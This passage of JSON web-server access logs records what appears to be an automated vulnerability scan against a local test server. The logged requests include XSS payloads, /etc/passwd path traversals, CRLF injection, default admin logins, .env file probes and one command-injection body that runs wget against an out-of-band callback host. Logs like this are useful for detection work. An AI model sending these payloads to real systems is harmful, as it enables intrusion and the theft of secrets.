/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"j_username=admin&j_password=admin&continue=&submit=submit+form","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /0/Authenticate HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"loginUsername=admin&loginPassword=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/submitLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"loginUsername=admin&loginPassword=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /submitLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"key=';`wget http://c9v8hs0smpv8c6ag07h0pdw7y67b85bfy.oast.online`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sws/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MdjY8MihCbxMKIYOlsDV8nLF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /OA_HTML/lcmServiceController.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", 